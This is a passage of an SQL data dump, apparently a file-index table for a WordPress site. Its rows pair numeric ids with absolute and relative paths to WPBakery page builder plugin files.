lasses/shortcodes/vc-gutenberg.php'),(1396,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-hoverbox.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-hoverbox.php'),(1397,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-icon.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-icon.php'),(1398,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-images-carousel.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-images-carousel.php'),(1399,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-line-chart.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-line-chart.php'),(1400,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-masonry-grid.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-masonry-grid.php'),(1401,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-masonry-media-grid.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-masonry-media-grid.php'),(1402,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-media-grid.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-media-grid.php'),(1403,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-message.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-message.php'),(1404,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-pie.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-pie.php'),(1405,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-pinterest.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-pinterest.php'),(1406,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-posts-slider.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-posts-slider.php'),(1407,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-progress-bar.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-progress-bar.php'),(1408,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-raw-html.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-raw-html.php'),(1409,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-raw-js.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-raw-js.php'),(1410,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-round-chart.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-round-chart.php'),(1411,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-row-inner.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-row-inner.php'),(1412,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-row.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-row.php'),(1413,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-section.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-section.php'),(1414,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-separator.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-separator.php'),(1415,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-single-image.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-single-image.php'),(1416,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-tab.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-tab.php'),(1417,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-tabs.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-tabs.php'),(1418,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-text-separator.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-text-separator.php'),(1419,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-toggle.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-toggle.php'),(1420,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-tour.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-tour.php'),(1421,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-tta-accordion.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-tta-accordion.php'),(1422,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-tta-pageable.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-tta-pageable.php'),(1423,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-tta-section.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-tta-section.php'),(1424,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-tta-tabs.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-tta-tabs.php'),(1425,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-tta-tour.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-tta-tour.php'),(1426,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-tweetmeme.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-tweetmeme.php'),(1427,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-twitter.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-twitter.php'),(1428,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-video.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-video.php'),(1429,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-widget-sidebar.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-widget-sidebar.php'),(1430,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-zigzag.php','wp-content/plugins/js_composer/include/classes/shortcodes/vc-zigzag.php'),(1431,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/wordpress-widgets.php','wp-content/plugins/js_composer/include/classes/shortcodes/wordpress-widgets.php'),(1432,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/updaters/class-vc-updater.php','wp-content/plugins/js_composer/include/classes/updaters/class-vc-updater.php'),(1433,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/updaters/class-vc-updating-manager.php','wp-content/plugins/js_composer/include/classes/updaters/class-vc-updating-manager.php'),(1434,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/class-vc-acf-shortcode.php','wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/class-vc-acf-shortcode.php'),(1435,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/class-vc-gitem-acf-shortcode.php','wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/class-vc-gitem-acf-shortcode.php'),(1436,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/grid-item-attributes.php','wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/grid-item-attributes.php'),(1437,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/grid-item-shortcodes.php','wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/grid-item-shortcodes.php'),(1438,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/shortcode.php','wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/shortcode.php'),(1439,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-advanced-custom-fields.php','wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-advanced-custom-fields.php'),(1440,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-contact-form7.php','wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-contact-form7.php'),(1441,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-jwplayer.php','wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-jwplayer.php'),(1442,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-layerslider.php','wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-layerslider.php'),(1443,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-mqtranslate.php','wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-mqtranslate.php'),(1444,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-ninja-forms.php','wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-ninja-forms.php'),(1445,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-qtranslate-x.php','wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-qtranslate-x.php'),(1446,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-qtranslate.php','wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-qtranslate.php'),(1447,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-revslider.php','wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-revslider.php'),(1448,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-woocommerce.php','wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-woocommerce.php'),(1449,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-wpml.php','wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-wpml.php'),(1450,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-yoast_seo.php','wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-yoast_seo.php'),(1451,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/vendors/plugins/woocommerce/class-vc-gitem-woocommerce-shortcode.php','wp-content/plugins/js_composer/include/classes/vendors/plugins/woocommerce/class-vc-gitem-woocommerce-shortcode.php'),(1452,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/vendors/plugins/woocommerce/grid-item-attributes.php','wp-content/plugins/js_composer/include/classes/vendors/plugins/woocommerce/grid-item-attributes.php'),(1453,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/vendors/plugins/woocommerce/grid-item-filters.php','wp-content/plugins/js_composer/include/classes/vendors/plugins/woocommerce/grid-item-filters.php'),(1454,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/vendors/plugins/woocommerce/grid-item-shortcodes.php','wp-content/plugins/js_composer/include/classes/vendors/plugins/woocommerce/grid-item-shortcodes.php'),(1455,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/helpers/class-vc-color-helper.php','wp-content/plugins/js_composer/include/helpers/class-vc-color-helper.php'),(1456,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/helpers/class-vc-image-filter.php','wp-content/plugins/js_composer/include/helpers/class-vc-image-filter.php'),(1457,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/helpers/helpers.php','wp-content/plugins/js_composer/include/helpers/helpers.php'),(1458,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/helpers/helpers_api.php','wp-content/plugins/js_composer/include/helpers/helpers_api.php'),(1459,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/helpers/helpers_factory.php','wp-content/plugins/js_composer/include/helpers/helpers_factory.php'),(1460,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/animation_style/animation_style.php','wp-content/plugins/js_composer/include/params/animation_style/animation_style.php'),(1461,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/autocomplete/autocomplete.php','wp-content/plugins/js_composer/include/params/autocomplete/autocomplete.php'),(1462,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/colorpicker/colorpicker.php','wp-content/plugins/js_composer/include/params/colorpicker/colorpicker.php'),(1463,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/column_offset/column_offset.php','wp-content/plugins/js_composer/include/params/column_offset/column_offset.php'),(1464,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/css_editor/css_editor.php','wp-content/plugins/js_composer/include/params/css_editor/css_editor.php'),(1465,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/custom_markup/custom_markup.php','wp-content/plugins/js_composer/include/params/custom_markup/custom_markup.php'),(1466,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/default_params.php','wp-content/plugins/js_composer/include/params/default_params.php'),(1467,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/el_id/el_id.php','wp-content/plugins/js_composer/include/params/el_id/el_id.php'),(1468,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/font_container/font_container.php','wp-content/plugins/js_composer/include/params/font_container/font_container.php'),(1469,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/google_fonts/google_fonts.php','wp-content/plugins/js_composer/include/params/google_fonts/google_fonts.php'),(1470,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/gutenberg/class-vc-gutenberg-param.php','wp-content/plugins/js_composer/include/params/gutenberg/class-vc-gutenberg-param.php'),(1471,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/gutenberg/gutenberg.php','wp-content/plugins/js_composer/include/params/gutenberg/gutenberg.php'),(1472,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/hidden/hidden.php','wp-content/plugins/js_composer/include/params/hidden/hidden.php'),(1473,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/href/href.php','wp-content/plugins/js_composer/include/params/href/href.php'),(1474,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/iconpicker/iconpicker.php','wp-content/plugins/js_composer/include/params/iconpicker/iconpicker.php'),(1475,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/load.php','wp-content/plugins/js_composer/include/params/load.php'),(1476,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/loop/loop.php','wp-content/plugins/js_composer/include/params/loop/loop.php'),(1477,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/options/options.php','wp-content/plugins/js_composer/include/params/options/options.php'),(1478,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/param_group/param_group.php','wp-content/plugins/js_composer/include/params/param_group/param_group.php'),(1479,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/params.php','wp-content/plugins/js_composer/include/params/params.php'),(1480,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/params_preset/params_preset.php','wp-content/plugins/js_composer/include/params/params_preset/params_preset.php'),(1481,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/sorted_list/sorted_list.php','wp-content/plugins/js_composer/include/params/sorted_list/sorted_list.php'),(1482,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/tab_id/tab_id.php','wp-content/plugins/js_composer/include/params/tab_id/tab_id.php'),(1483,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/textarea_html/textarea_html.php','wp-content/plugins/js_composer/include/params/textarea_html/textarea_html.php'),(1484,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/vc_grid_element/vc_grid_element.php','wp-content/plugins/js_composer/include/params/vc_grid_element/vc_grid_element.php'),(1485,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/vc_grid_element/vc_grid_id/vc_grid_id.php','wp-content/plugins/js_composer/include/params/vc_grid_element/vc_grid_id/vc_grid_id.php'),(1486,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/vc_grid_item/attributes.php','wp-content/plugins/js_composer/include/params/vc_grid_item/attributes.php'),(1487,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/vc_grid_item/class-vc-grid-item.php','wp-content/plugins/js_composer/include/params/vc_grid_item/class-vc-grid-item.php'),(1488,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/vc_grid_item/class-wpb-map-grid-item.php','wp-content/plugins/js_composer/include/params/vc_grid_item/class-wpb-map-grid-item.php'),(1489,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/vc_grid_item/editor/class-vc-grid-item-editor.php','wp-content/plugins/js_composer/include/params/vc_grid_item/editor/class-vc-grid-item-editor.php'),(1490,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/vc_grid_item/editor/class-vc-grid-item-preview.php','wp-content/plugins/js_composer/include/params/vc_grid_item/editor/class-vc-grid-item-preview.php'),(1491,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/vc_grid_item/editor/navbar/class-vc-navbar-grid-item.php','wp-content/plugins/js_composer/include/params/vc_grid_item/editor/navbar/class-vc-navbar-grid-item.php'),(1492,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/vc_grid_item/editor/popups/class-vc-add-element-box-grid-item.php','wp-content/plugins/js_composer/include/params/vc_grid_item/editor/popups/class-vc-add-element-box-grid-item.php'),(1493,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/vc_grid_item/editor/popups/class-vc-templates-editor-grid-item.php','wp-content/plugins/js_composer/include/params/vc_grid_item/editor/popups/class-vc-templates-editor-grid-item.php'),(1494,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/vc_grid_item/shortcodes.php','wp-content/plugins/js_composer/include/params/vc_grid_item/shortcodes.php'),(1495,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/vc_grid_item/templates.php','wp-content/plugins/js_composer/include/params/vc_grid_item/templates.php'),(1496,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/vc_link/vc_link.php','wp-content/plugins/js_composer/include/params/vc_link/vc_link.php'),(1497,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/backend_editor.tpl.php','wp-content/plugins/js_composer/include/templates/editors/backend_editor.tpl.php'),(1498,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/frontend_editor.tpl.php','wp-content/plugins/js_composer/include/templates/editors/frontend_editor.tpl.php'),(1499,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/frontend_template.tpl.php','wp-content/plugins/js_composer/include/templates/editors/frontend_template.tpl.php'),(1500,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/navbar/navbar.tpl.php','wp-content/plugins/js_composer/include/templates/editors/navbar/navbar.tpl.php'),(1501,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/access-manager-js.tpl.php','wp-content/plugins/js_composer/include/templates/editors/partials/access-manager-js.tpl.php'),(1502,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/add_element_search.tpl.php','wp-content/plugins/js_composer/include/templates/editors/partials/add_element_search.tpl.php'),(1503,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/add_element_tabs.tpl.php','wp-content/plugins/js_composer/include/templates/editors/partials/add_element_tabs.tpl.php'),(1504,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/backend-shortcodes-templates.tpl.php','wp-content/plugins/js_composer/include/templates/editors/partials/backend-shortcodes-templates.tpl.php'),(1505,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/backend_controls.tpl.php','wp-content/plugins/js_composer/include/templates/editors/partials/backend_controls.tpl.php'),(1506,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/backend_controls_tab.tpl.php','wp-content/plugins/js_composer/include/templates/editors/partials/backend_controls_tab.tpl.php'),(1507,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/backend_editor_footer.tpl.php','wp-content/plugins/js_composer/include/templates/editors/partials/backend_editor_footer.tpl.php'),(1508,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/frontend_controls.tpl.php','wp-content/plugins/js_composer/include/templates/editors/partials/frontend_controls.tpl.php'),(1509,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/post_shortcodes.tpl.php','wp-content/plugins/js_composer/include/templates/editors/partials/post_shortcodes.tpl.php'),(1510,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/prompt-presets.tpl.php','wp-content/plugins/js_composer/include/templates/editors/partials/prompt-presets.tpl.php'),(1511,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/prompt-templates.tpl.php','wp-content/plugins/js_composer/include/templates/editors/partials/prompt-templates.tpl.php'),(1512,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/settings_presets_popup.tpl.php','wp-content/plugins/js_composer/include/templates/editors/partials/settings_presets_popup.tpl.php'),(1513,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/templates_search.tpl.php','wp-content/plugins/js_composer/include/templates/editors/partials/templates_search.tpl.php'),(1514,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/vc_settings-image-block.tpl.php','wp-content/plugins/js_composer/include/templates/editors/partials/vc_settings-image-block.tpl.php'),(1515,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/vc_ui-settings-dropdown.tpl.php','wp-content/plugins/js_composer/include/templates/editors/partials/vc_ui-settings-dropdown.tpl.php'),(1516,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/vc_ui-templates-tabs.tpl.php','wp-content/plugins/js_composer/include/templates/editors/partials/vc_ui-templates-tabs.tpl.php'),(1517,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/vc_welcome_block.tpl.php','wp-content/plugins/js_composer/include/templates/editors/partials/vc_welcome_block.tpl.php'),(1518,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/popups/modal_edit_element.tpl.php','wp-content/plugins/js_composer/include/templates/editors/popups/modal_edit_element.tpl.php'),(1519,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/popups/panel_multi_shortcode_edit_form.tpl.php','wp-content/plugins/js_composer/include/templates/editors/popups/panel_multi_shortcode_edit_form.tpl.php'),(1520,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/popups/panel_shortcode_edit_form.tpl.php','wp-content/plugins/js_composer/include/templates/editors/popups/panel_shortcode_edit_form.tpl.php'),(1521,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/popups/shared-templates/category.tpl.php','wp-content/plugins/js_composer/include/templates/editors/popups/shared-templates/category.tpl.php'),(1522,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-footer.tpl.php','wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-footer.tpl.php'),(1523,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-header.tpl.php','wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-header.tpl.php'),(1524,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-panel-add-element.tpl.php','wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-panel-add-element.tpl.php'),(1525,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-panel-edit-element.tpl.php','wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-panel-edit-element.tpl.php'),(1526,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-panel-post-settings.tpl.php','wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-panel-post-settings.tpl.php'),(1527,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-panel-preset.tpl.php','wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-panel-preset.tpl.php'),(1528,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-panel-row-layout.tpl.php','wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-panel-row-layout.tpl.php'),(1529,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-panel-templates.tpl.php','wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-panel-templates.tpl.php'),(1530,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/vc_ui-template-preview.tpl.php','wp-content/plugins/js_composer/include/templates/editors/vc_ui-template-preview.tpl.php'),(1531,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/partials/_settings_tabs.php','wp-content/plugins/js_composer/include/templates/pages/partials/_settings_tabs.php'),(1532,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/partials/_tabs.php','wp-content/plugins/js_composer/include/templates/pages/partials/_tabs.php'),(1533,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_backend_editor.tpl.php','wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_backend_editor.tpl.php'),(1534,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_dragndrop.tpl.php','wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_dragndrop.tpl.php'),(1535,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_frontend_editor.tpl.php','wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_frontend_editor.tpl.php'),(1536,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_grid_builder.tpl.php','wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_grid_builder.tpl.php'),(1537,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_part.tpl.php','wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_part.tpl.php'),(1538,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_post_settings.tpl.php','wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_post_settings.tpl.php'),(1539,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_post_types.tpl.php','wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_post_types.tpl.php'),(1540,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_presets.tpl.php','wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_presets.tpl.php'),(1541,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_settings.tpl.php','wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_settings.tpl.php'),(1542,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_shortcodes.tpl.php','wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_shortcodes.tpl.php'),(1543,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_templates.tpl.php','wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_templates.tpl.php'),(1544,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/vc-settings/default-template-post-type.tpl.php','wp-content/plugins/js_composer/include/templates/pages/vc-settings/default-template-post-type.tpl.php'),(1545,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/